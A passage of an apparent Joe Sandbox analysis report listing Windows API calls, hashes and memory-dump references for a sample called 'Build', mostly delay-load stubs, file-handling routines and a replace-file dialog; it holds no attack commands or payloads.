                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 358cf83602c88d2e9e8c41eead9d223b3644e26c976c38576748a77f4a92d499
                                                                                                                                                                                • Instruction ID: 25b49106db0d8ebc8c2eac8fa005eb57120ed52ca22d84ea12295d903dcd5aed
                                                                                                                                                                                • Opcode Fuzzy Hash: 358cf83602c88d2e9e8c41eead9d223b3644e26c976c38576748a77f4a92d499
                                                                                                                                                                                • Instruction Fuzzy Hash: 25A011C23B8003BC3808328AAE02C3B028CC0C0B20330CAFAF80AC0082A88828000030
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B609FC
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 3834bc0f30aac7166e770eb74c08b2f5bcb35e80e87e0d21d5b0dc12dccb8774
                                                                                                                                                                                • Instruction ID: 25b49106db0d8ebc8c2eac8fa005eb57120ed52ca22d84ea12295d903dcd5aed
                                                                                                                                                                                • Opcode Fuzzy Hash: 3834bc0f30aac7166e770eb74c08b2f5bcb35e80e87e0d21d5b0dc12dccb8774
                                                                                                                                                                                • Instruction Fuzzy Hash: 25A011C23B8003BC3808328AAE02C3B028CC0C0B20330CAFAF80AC0082A88828000030
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B609FC
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 3244e3aa6822354030e4e3b6dbbb5408cf7393d534dc7fe78cb903daf1d64311
                                                                                                                                                                                • Instruction ID: 25b49106db0d8ebc8c2eac8fa005eb57120ed52ca22d84ea12295d903dcd5aed
                                                                                                                                                                                • Opcode Fuzzy Hash: 3244e3aa6822354030e4e3b6dbbb5408cf7393d534dc7fe78cb903daf1d64311
                                                                                                                                                                                • Instruction Fuzzy Hash: 25A011C23B8003BC3808328AAE02C3B028CC0C0B20330CAFAF80AC0082A88828000030
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 3170c457428640cab2cfa4dff60f93873255df6a0ee79995c3b9cc4f3738955c
                                                                                                                                                                                • Instruction ID: 0dc70bbb2026919b6786dff14646349037b22f384ed633c00e82b6ff5d32d71f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3170c457428640cab2cfa4dff60f93873255df6a0ee79995c3b9cc4f3738955c
                                                                                                                                                                                • Instruction Fuzzy Hash: 5FA002D52B9103FC350971D69D56C3701DCD4C5B55730D9E9F455C4151544518455435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 57e88a561ab57058656876916582db45484003a8826558cf87d177e3dcab0a7c
                                                                                                                                                                                • Instruction ID: 0dc70bbb2026919b6786dff14646349037b22f384ed633c00e82b6ff5d32d71f
                                                                                                                                                                                • Opcode Fuzzy Hash: 57e88a561ab57058656876916582db45484003a8826558cf87d177e3dcab0a7c
                                                                                                                                                                                • Instruction Fuzzy Hash: 5FA002D52B9103FC350971D69D56C3701DCD4C5B55730D9E9F455C4151544518455435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 4a9f29f606a1296cdb0f9a88098b60dc3202b27f1715529662e424b140188dda
                                                                                                                                                                                • Instruction ID: 96dd3b89274517e4f398c99c74cfb8c2d3432249a3af149b447ae96da535624b
                                                                                                                                                                                • Opcode Fuzzy Hash: 4a9f29f606a1296cdb0f9a88098b60dc3202b27f1715529662e424b140188dda
                                                                                                                                                                                • Instruction Fuzzy Hash: 69A012C12B4102BC310971D29C16C3702CCD4C0B10330C5E9F404C0040644418010030
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B609FC
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 36f107c5f6a75c3153278664e5cb842579b3f7462bcbf83e27d8535d921de7ce
                                                                                                                                                                                • Instruction ID: 25b49106db0d8ebc8c2eac8fa005eb57120ed52ca22d84ea12295d903dcd5aed
                                                                                                                                                                                • Opcode Fuzzy Hash: 36f107c5f6a75c3153278664e5cb842579b3f7462bcbf83e27d8535d921de7ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 25A011C23B8003BC3808328AAE02C3B028CC0C0B20330CAFAF80AC0082A88828000030
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetEndOfFile.KERNELBASE(?,00B4A712,?,?,?,?,?,?,?), ref: 00B4B94C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 749574446-0
                                                                                                                                                                                • Opcode ID: 3474b2e5463a5a2b90bafdc21355a6cfa359e80c92c34f1fbdc4659cef167433
                                                                                                                                                                                • Instruction ID: 3c9ff3e984e91b258d5185cb14c02c1542184549b0a218632a23c1d7425e5841
                                                                                                                                                                                • Opcode Fuzzy Hash: 3474b2e5463a5a2b90bafdc21355a6cfa359e80c92c34f1fbdc4659cef167433
                                                                                                                                                                                • Instruction Fuzzy Hash: 88A0113008080A8A8E002B30CA0880C3B20FB20BC030002A8A00BCB0A2CB22888B8A00
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?), ref: 00B5CBBA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1611563598-0
                                                                                                                                                                                • Opcode ID: 086a1e17ae54834a299f6aaa93ae5d54c7a0136469012b16014e88e26ef90eed
                                                                                                                                                                                • Instruction ID: fed3b17645007d3fb1742ee70e7ddd916b5232782f32beb0ba24e32e784319be
                                                                                                                                                                                • Opcode Fuzzy Hash: 086a1e17ae54834a299f6aaa93ae5d54c7a0136469012b16014e88e26ef90eed
                                                                                                                                                                                • Instruction Fuzzy Hash: 13A011302002008B82000B328F0AA0EBBAAAFA2A00F00C028A00A80030CB3288A0EA00
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B41366: GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
                                                                                                                                                                                  • Part of subcall function 00B41366: SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0
                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B5E602
                                                                                                                                                                                • EndDialog.USER32(?,00000006), ref: 00B5E615
                                                                                                                                                                                • GetDlgItem.USER32(?,0000006C), ref: 00B5E631
                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00B5E638
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000065,?), ref: 00B5E66C
                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B5E69F
                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00B5E6B5
                                                                                                                                                                                  • Part of subcall function 00B5CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5CBEE
                                                                                                                                                                                  • Part of subcall function 00B5CBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B5CC05
                                                                                                                                                                                  • Part of subcall function 00B5CBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 00B5CC19
                                                                                                                                                                                  • Part of subcall function 00B5CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5CC2A
                                                                                                                                                                                  • Part of subcall function 00B5CBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B5CC42
                                                                                                                                                                                  • Part of subcall function 00B5CBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 00B5CC66
                                                                                                                                                                                  • Part of subcall function 00B5CBC8: _swprintf.LIBCMT ref: 00B5CC85
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B5E704
                                                                                                                                                                                  • Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B5E717
                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00B5E71E
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B5E773
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000068,?), ref: 00B5E786
                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B5E7A0
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B5E7D9
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B5E7EC
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B5E83C
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000069,?), ref: 00B5E84F
                                                                                                                                                                                  • Part of subcall function 00B5D0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B5D0E1
                                                                                                                                                                                  • Part of subcall function 00B5D0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,00B8272C,?,?), ref: 00B5D12A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                                                                                                                                                                • String ID: %s %s$REPLACEFILEDLG
                                                                                                                                                                                • API String ID: 3464475507-439456425
                                                                                                                                                                                • Opcode ID: e090060f972776b602925b0efa854bb442c8bdaca35677a7c246c690f8a9cf46
                                                                                                                                                                                • Instruction ID: 9a2f171afa94cdaca6e039d41cac7b787c30d03d976ba34d8ca39c21351f4e86
                                                                                                                                                                                • Opcode Fuzzy Hash: e090060f972776b602925b0efa854bb442c8bdaca35677a7c246c690f8a9cf46
                                                                                                                                                                                • Instruction Fuzzy Hash: 5971DB72648344BFE3359B64DC8AFFF77DCEB85701F040899FA59D6081EA719A088762
                                                                                                                                                                                APIs
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4807F
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B48112
                                                                                                                                                                                  • Part of subcall function 00B48C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B48CB2
                                                                                                                                                                                  • Part of subcall function 00B48C95: GetLastError.KERNEL32 ref: 00B48CF6
                                                                                                                                                                                  • Part of subcall function 00B48C95: CloseHandle.KERNEL32(?), ref: 00B48D05
                                                                                                                                                                                  • Part of subcall function 00B4BC65: DeleteFileW.KERNELBASE(?,?,?,?,00B4B14B,?,00000000,00B4AF6E,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?,?), ref: 00B4BC82
                                                                                                                                                                                  • Part of subcall function 00B4BC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,00B4B14B,?,00000000,00B4AF6E,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?), ref: 00B4BCAE
                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00B481C1
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00B481DD
                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,CEEE5757,00000000), ref: 00B48329
                                                                                                                                                                                  • Part of subcall function 00B4B7E2: FlushFileBuffers.KERNEL32(?), ref: 00B4B7FC
                                                                                                                                                                                  • Part of subcall function 00B4B7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00B4B8B0
                                                                                                                                                                                  • Part of subcall function 00B4AFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,00B4AF75,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?,?), ref: 00B4AFEB
                                                                                                                                                                                  • Part of subcall function 00B4C2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,00B4BF5E,?,?), ref: 00B4C305
                                                                                                                                                                                  • Part of subcall function 00B4C2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B4BF5E,?,?), ref: 00B4C334
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationProcessTime
                                                                                                                                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                • API String ID: 243576179-3508440684
                                                                                                                                                                                • Opcode ID: 7c98bbd451fb456530a6b0f28b8e8b92b90097987f7cecdba1d432696293f5b1
                                                                                                                                                                                • Instruction ID: 181bc5448c93f6a2f963cb1615d72da2426c35a215ffc4bfbf0590d80c927d21
                                                                                                                                                                                • Opcode Fuzzy Hash: 7c98bbd451fb456530a6b0f28b8e8b92b90097987f7cecdba1d432696293f5b1
